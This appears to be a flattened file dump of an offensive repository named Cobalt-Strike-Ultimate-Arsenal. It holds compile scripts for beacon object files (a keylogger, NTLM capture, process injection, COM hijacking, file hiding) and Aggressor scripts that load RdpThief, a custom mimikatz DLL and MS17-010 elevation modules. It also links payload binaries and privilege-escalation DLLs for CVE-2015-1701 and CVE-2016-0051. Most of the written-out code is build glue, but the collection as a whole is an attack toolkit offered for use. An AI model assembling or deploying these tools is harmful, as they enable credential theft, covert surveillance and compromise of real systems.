-------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumwebclient.c 4 | move /y enumwebclient.obj enumwebclient.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cd udrl && make $@ 3 | cd postex-udrl && make $@ 4 | 5 | clean: 6 | cd udrl && make $@ 7 | cd postex-udrl && make $@ 8 | -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/cobalt-strike-mandll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/cobalt-strike-mandll.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/option-stageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/option-stageless.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/scarecrow-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/scarecrow-console.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/scarecrow-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/scarecrow-options.png -------------------------------------------------------------------------------- /Cobatl Strike/DllComHijacking/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllcomhijacking.c 4 | move /y dllcomhijacking.obj dllcomhijacking.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumLocalCert/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumlocalcert.c 4 | move /y enumlocalcert.obj enumlocalcert.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumTaskScheduler/enumtaskscheduler.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumTaskScheduler/enumtaskscheduler.o -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/third/rdpthief/RdpThief_x64.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Erebus/third/rdpthief/RdpThief_x64.tmp -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/GoogleCSAgent.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/GoogleCSAgent.jar -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/meme.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/meme.jpg -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/controlwindow.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | BOOL CW_Register( WNDPROC lpfnWndProc ); 4 | HWND CW_Create( DWORD uhid, DWORD width, DWORD height ); 5 | -------------------------------------------------------------------------------- /Cobatl Strike/InjectPoolParty/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc injectpoolparty.c 4 | move /y injectpoolparty.obj injectpoolparty.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/KeyloggerRawInput/keyloggerrawinput.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/KeyloggerRawInput/keyloggerrawinput.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x86.obj -------------------------------------------------------------------------------- /Cobatl Strike/AddFirewallRule/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addfirewallrule.c 4 | move /y addfirewallrule.obj addfirewallrule.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/AddTaskScheduler/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addtaskscheduler.c 4 | move /y addtaskscheduler.obj addtaskscheduler.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/CaptureNetNTLM/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc capturenetntlm.c 4 | move /y capturenetntlm.obj capturenetntlm.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/DelTaskScheduler/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc deltaskscheduler.c 4 | move /y deltaskscheduler.obj deltaskscheduler.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/ExecuteCrossSession/executecrosssession.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/ExecuteCrossSession/executecrosssession.o -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc forcelockscreen.c 4 | move /y forcelockscreen.obj forcelockscreen.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/KeyloggerRawInput/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc keyloggerrawinput.c 4 | move /y keyloggerrawinput.obj keyloggerrawinput.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/NoPowerShell.exe.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/NoPowerShell.exe.lnk -------------------------------------------------------------------------------- /ArtifactKit/output/Readme.md: -------------------------------------------------------------------------------- 1 | This directory will contain the output from the compile process. You should probably include your artifact.cna in this directory for importing into cobalt strike. -------------------------------------------------------------------------------- /Cobatl Strike/AddTaskScheduler/addtaskschedulerNoSYSTEM.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddTaskScheduler/addtaskschedulerNoSYSTEM.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike DingtalkBot/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2024.8.30 2 | charset-normalizer==3.3.2 3 | DingtalkChatbot==1.5.7 4 | idna==3.8 5 | requests==2.32.3 6 | urllib3==2.2.2 7 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumSecProducts/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumsecproducts.c 4 | move /y enumsecproducts.obj enumsecproducts.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumTaskScheduler/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumtaskscheduler.c 4 | move /y enumtaskscheduler.obj enumtaskscheduler.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/CypherAES.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/CypherAES.exe -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/payload_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/payload_x64.bin -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/NoPowerShell32.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/NoPowerShell32.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/NoPowerShell64.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/NoPowerShell64.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/BOFs/MiniDumpWriteDump/minidumpwritedump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOFs/MiniDumpWriteDump/minidumpwritedump.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.exe -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.pdb -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.exe -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.pdb -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/logo.png -------------------------------------------------------------------------------- /Cobatl Strike/ExecuteCrossSession/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc executecrosssession.c 4 | move /y executecrosssession.obj executecrosssession.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/OEFInjection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/OEFInjection.exe -------------------------------------------------------------------------------- /Cobatl Strike/LoadLib/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc loadlib.c 4 | move /y loadlib.obj loadlib.o 5 | dumpbin /disasm loadlib.o > loadlib.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/BOFs/MiniDumpWriteDump/Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := minidumpwritedump 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | 4 | all: 5 | $(CC_x64) -o $(BOFNAME).x64.o -c bof.c -masm=intel -Wno-multichar 6 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/internal/tasks.go: -------------------------------------------------------------------------------- 1 | package internal 2 | 3 | func Task(cmd uint32, data []byte) (uint32, []byte) { 4 | switch cmd { 5 | default: 6 | return 32,[]byte("not a command") 7 | } 8 | } -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/modules/third.cna: -------------------------------------------------------------------------------- 1 | menu "Third-party"{ 2 | include(script_resource("third/rdpthief/RdpThief.cna")); 3 | include(script_resource("third/EventLogMaster/eventlog.cna")); 4 | } -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Wed Dec 08 11:43:19 CST 2021 3 | version=1.0-SNAPSHOT 4 | groupId=org.example 5 | artifactId=GoogleCSAgent 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/original-GoogleCSAgent.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/original-GoogleCSAgent.jar -------------------------------------------------------------------------------- /Cobatl Strike/HideFile/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc hidefile.c 4 | move /y hidefile.obj hidefile.o 5 | dumpbin /disasm hidefile.o > hidefile.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell.exe.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell.exe.lnk -------------------------------------------------------------------------------- /Cobatl Strike/Sweet Potato CS/README.md: -------------------------------------------------------------------------------- 1 | # SweetPotato_CS 2 | 修改的SweetPotato,使之可以用于CobaltStrike v4.0 3 | 4 | ![image-20200416161314722](https://tva1.sinaimg.cn/large/007S8ZIlgy1gdvoe062kej325f0u0jy7.jpg) -------------------------------------------------------------------------------- /Cobatl Strike/killswitch GUI/host/dnscheckin.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial_empty { 2 | bmode($1, "dns-txt"); 3 | bcheckin($1); 4 | bnote($1, "-needs to be evaluated!"); 5 | bsleep($1, 120, 20) 6 | } 7 | -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x64.dll -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/elevate/modules/cve-2016-0051.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/rasta-mouse/elevate/modules/cve-2016-0051.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/netjoin_query/netjoin_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/recon/netjoin_query/netjoin_query.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/dump.stg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/dump.stg -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-3.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-4.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120182036394.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120182036394.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120183734599.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120183734599.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120184525198.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120184525198.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185036090.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185036090.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185247702.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185247702.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185331891.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185331891.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185407471.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185407471.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185526954.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185526954.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190024068.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190024068.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190544328.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190544328.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120192844335.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120192844335.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike MS17-010/aggressor.cna: -------------------------------------------------------------------------------- 1 | include(script_resource("modules/elevate.cna")); 2 | include(script_resource("modules/getinfo.cna")); 3 | include(script_resource("modules/pwndog.cna")); 4 | -------------------------------------------------------------------------------- /Cobatl Strike/KeyloggerRawInput/keyloggerrawinput-noForeground.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/KeyloggerRawInput/keyloggerrawinput-noForeground.o -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell32.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell32.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell64.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell64.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x86.obj -------------------------------------------------------------------------------- /Loader/AceLdr/src/retaddr.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOID a, PVOID b, PVOID c, PVOID d, PVOID e, PVOID f, PVOID g, PVOID h ); 4 | -------------------------------------------------------------------------------- /Mimikatz Kit/mimikatz.cna: -------------------------------------------------------------------------------- 1 | set MIMIKATZ_INTERNAL { 2 | $mimidllpath = script_resource($1); 3 | warn("Loading custom mimikatz dll from: " . $mimidllpath); 4 | return $mimidllpath; 5 | } 6 | 7 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/tick.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | 3 | .global cpu_clock 4 | .type cpu_clock, @function 5 | 6 | cpu_clock: 7 | rdtsc 8 | shl rdx, 32 9 | or rax, rdx 10 | ret 11 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/tick.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | 3 | .global cpu_clock 4 | .type cpu_clock, @function 5 | 6 | cpu_clock: 7 | rdtsc 8 | shl rdx, 32 9 | or rax, rdx 10 | ret 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/wef_detect/wef_detect.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/wef_detect/wef_detect.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token.png -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent.class -------------------------------------------------------------------------------- /Cobatl Strike/Mory/utils/mimes.js: -------------------------------------------------------------------------------- 1 | export default { 2 | 'jpg': 'image/jpeg', 3 | 'png': 'image/png', 4 | 'gif': 'image/gif', 5 | 'svg': 'image/svg+xml', 6 | 'psd': 'image/photoshop' 7 | }; 8 | -------------------------------------------------------------------------------- /Cobatl Strike/Sweet Potato CS/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/asr_status/asr_status.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/asr_status/asr_status.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-message-CS.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-message-CS.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/locate-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/locate-example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/output/payload_x64_blob.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/output/payload_x64_blob.enc -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_dll/beacon_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_exe/beacon_exe.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/clipboard_grab/clipboard_grab.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/cred_access/clipboard_grab/clipboard_grab.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/aad_ca_policy/aad_ca_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl 